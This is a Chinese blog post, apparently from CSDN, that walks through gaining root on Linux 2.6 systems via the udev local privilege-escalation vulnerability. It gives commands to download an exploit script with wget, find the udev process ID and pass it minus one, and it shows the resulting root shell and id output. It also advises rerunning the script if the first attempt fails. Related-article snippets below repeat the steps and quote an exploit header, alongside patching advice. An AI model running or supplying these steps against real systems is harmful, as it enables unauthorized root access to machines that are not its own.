udev漏洞提权过程

最新推荐文章于 2021-05-16 12:18:54 发布
最新推荐文章于 2021-05-16 12:18:54 发布
阅读量3k 收藏
点赞数
文章标签: function 脚本

1)下载攻击脚本:
wget http://www.extmail .org/source/exploit-udev-8478

2)获得udev进程号
执行:ps ax|grep udev|grep -v grep|awk {'print $1'} 获得udev进程号,然后将此数字减1作为
exploit-udev-8478的参数,例如命令结果为143则参数为142

3)执行:
sh exploit-udev-8478 142
suid.c: In function ‘main’:
suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
sh-3.1#
然后id 看看:
uid=0(root) gid=0(root) groups=65530(hzqbbc)

顺利获得root权限,如果无法获得root权限,要多执行脚本几次,一般第二次即可获得root权限。

cnbird2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
udev的升级包,防止udev漏洞取得root权限
04-28
udev的升级包,可以防止利用udev漏洞非法取得root权限。
udev移植到arm板上
05-05
- 移植过程中可能会遇到权限问题,需要合理配置udev的运行用户和组,以及系统其他服务与udev的交互权限。 - 如果设备驱动未正确加载,udev也无法创建对应的设备节点,因此需检查内核驱动部分。 7. **优化与调试**...
udev漏洞,普通用户变root
weixin_34025051的博客
04-26 101
1. 在LINUX目录下建立test 帐户 2.下载udev.sh脚本 在http://milw0rm.com/exploits/8478 3.查看UDEV的PID 方法一: 先cat /proc/net/netlink ffff810077587400 15364 ffffffff 0 0 0000000000000...
普通用户通过udev漏洞提升到root权限
ace_fei的专栏
12-06 1454
#!/bin/sh # Linux 2.6 # bug found by Sebastian Krahmer # # lame sploit using LD technique # by kcope in 2009 # tested on debian-etch,ubuntu,gentoo # do a 'cat /proc/net/netlink' # and set the first a
Linux利用udev提权
weixin_34281537的博客
11-07 306
友老催我写个webshell+udev localroot的文章。这周末有点空闲时间,捣鼓了一下。公开的udev exploit有两个。一个是kcope写的SHELL版本,一个是jon写的C版本。 shell版本的执行起来有点问题,很明显已经以root身份执行了sh -c chown root:root /tmp/suid; chmod +s /tmp/...
Linux UDEV提权过程
weixin_30323631的博客
04-02 198
1.下载攻击脚本 [test@H0f ~]$ wget http://www.extmail .org/source/exploit-udev-8478 --2018-04-02 01:21:00-- http://www.extmail/ Resolving www.extmail... failed: Name or service not known. wget: unable...
udev:Linux里严重的本地安全漏洞
qdujunjie的专栏
03-25 2066
转自:http://www.ha97.com/1002.html 经过验证,我个人认为udev漏洞是linux有史以来最危险的本地安全漏洞,通杀X86和X64架构下N个发行版的N个大版本和子版本,影响面相当大,互联网的血雨腥风即将到来。 这个漏洞对各大企业的安全人员发起挑战,我们的软件资产管理系统是否有足够的数据支撑我们做下面的事情? 1、给哪些系统打补
suse使用udev管理asm.docx
02-21
在SUSE Linux Enterprise Server (SLES) 11中,udev是系统设备管理的主要工具,它负责管理和控制系统的硬件设备,如磁盘、网络接口等。对于Oracle 11gR2 RAC(Real Application Clusters)的部署,udev的配置至关...
linux下udev的使用
11-27
Udev 的配置文件位于 `/etc/udev/udev.conf`,其中设置了 udev 的一些基本参数,如 `udev_root`、`udev_rules` 和 `udev_log` 等。其中,`udev_root` 设置了 udev 的根目录,`udev_rules` 设置了规则文件的存放地址...
linux用户空间程序udev使用总结
07-23
Linux中的udev是一个重要的设备管理器,自Linux内核3.10版本以来,它已经取代了devfs和hotplug等旧的设备管理系统。udev运行在用户空间,负责处理硬件的添加和删除,确保用户空间对设备的操作能够正确、稳定地进行。...
Linux Kernel 2.6 UDEV本地提权
末末很爱
01-17 252
1)创建用户:假设系统上已经建立了一个名为"ttalang",密码为"ttalang"的普通用户,并用该账户登录;(注意:ttalang的用户目录为/home/ttalang)  [ttalang@vmhost ~]$ pwd  /home/ttalang    2)复制代码:如下:完整复制该页面的代码,在本地ttalang目录下保存为名为"a"的文件;(注意:此时a的状态为/hom...
Linux的udev 提权漏洞
weixin_34198453的博客
04-27 105
Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序。(2.4内核系统不受影响)修复方法(修复前请备份重要数据): debian用户请执行apt-get update ; apt-get upgrade -y centos用户请执行yum update udev RedHat用户请使用官方rpm包更新或者购买RedHat的s...
linux 抓udev包,udev:Linux里严重的本地安全漏洞
weixin_33423069的博客
05-16 140
#!/bin/sh# Linux 2.6# bug found by Sebastian Krahmer## lame sploit using LD technique# by kcope in 2009# tested on debian-etch,ubuntu,gentoo# do a ‘cat /proc/net/netlink’# and set the first arg to thi...
linux udev漏洞演示
weixin_34177064的博客
06-01 127
Linux***之udev漏洞演示 此漏洞针对linux2.6内核,只要有普通用户权限,即可提升root权限,开始实验吧 1、复制以下代码,保存为udev.sh,并赋予可执行权限 2、#useraddtest//新建一个普通用户 3、#su-test//切换至test用户 4、#ps-ef|grepude...
linux内核 漏洞扫描,关于Linux 2.6 kernel udev 漏洞的检测及修补
weixin_42480540的博客
04-30 246
最近闹的很凶的Linux udev漏洞对2.6系列的CentOS/RHEL 5.x(除了5.3)都有效,而对2.4系列的则无效,对于CentOS/RHEL 4.x 经过测试,按本文攻击方法无效,但是否真的无效还有待真正高手验证!请大家必须打起12分精神。赶紧升级。ExtMail团队已经将所有我们掌控的Linux服务器(2.6 kernel,5.x 系列)全部升级完毕。以下是检测方法和升级方法,请路...
Linux攻防之udev漏洞演示
06-01 635
漏洞针对linux2.6内核,只要有普通用户权限,即可提升root权限,开始实验吧 1、复制以下代码,保存为udev.sh,并赋予可执行权限 2、#useradd test //新建一个普通用户 3、#su - test //切换至test用户 4、#ps -ef |grep udev //查看udev id root 474 1 0 Apr09 ? 00:00:00 /sbin/udevd -d 5、#sh udev.sh 473 //执行命令,udevd的id号减1,即473 6、sh-
udev机制一之udev原理
huangminilong的博客
11-06 5805
问题背景:用户插入U盘后需要自动打开U盘目录,但是发现U盘每次挂载点都不一样,测试两个U盘的挂载点分别是/media/sda1和/media/sda4,所以就需要了解一下linux的udev机制了   这应该是对udev和mdev的一个理解,我们下次可以再深入一些. dev 和mdev 是两个使用uevent 机制处理热插拔问题的用户空间程序,两者的实现机理不同。udev 是基于netlink...
extmail 修改root用户密码
ttfy1234的专栏
07-22 1582
mysql>use mysql; mysql> update user set password=password('test')where user='root'; mysql> flush privileges; 这样,MySQL数据库root用户的口令也被改成test了。其中最后一句命令flush privileges的意思是强制刷新内存授权 表,否则用的还是缓冲中的口令,这时非
udev机制详细实现过程
最新发布
03-30
udev机制是Linux系统中用于动态管理设备的一种机制,它的实现过程主要包括以下几个步骤: 1. 获取设备信息 当系统启动时,udev会扫描所有已连接的设备,并通过/sys/class目录下的文件获取设备的相关信息,如设备...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值